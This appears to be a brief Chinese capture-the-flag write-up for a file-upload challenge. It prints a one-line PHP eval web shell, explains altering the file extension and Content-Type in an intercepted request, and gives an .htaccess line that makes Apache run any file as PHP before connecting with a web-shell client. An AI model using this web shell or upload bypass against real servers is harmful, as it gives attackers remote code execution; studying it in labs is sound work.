一句话木马upload.php
<?php @eval($_POST[‘123‘]); ?>
上传之后抓包,将文件后缀和Content-Type类型修改,如下图:
上传成功,且返回文件了文件路径。这个时候无法用蚁剑连接,因为上传的是jpg文件无法解析成php,需要上传.htaccess文件,将其他的文件类型当做php解析
.htaccess 内容:
SetHandler application/x-httpd-php
这语句的作用是让Apache将其他类型文件均以php格式解析
蚁剑连接:http://5d55e59d-06fa-4047-a72e-50f550ffe912.node3.buuoj.cn/upload/9b7b2e9bfa69befdb7e764f186440602/upload.jpg
原文:https://www.cnblogs.com/hackcaixukun/p/14100861.html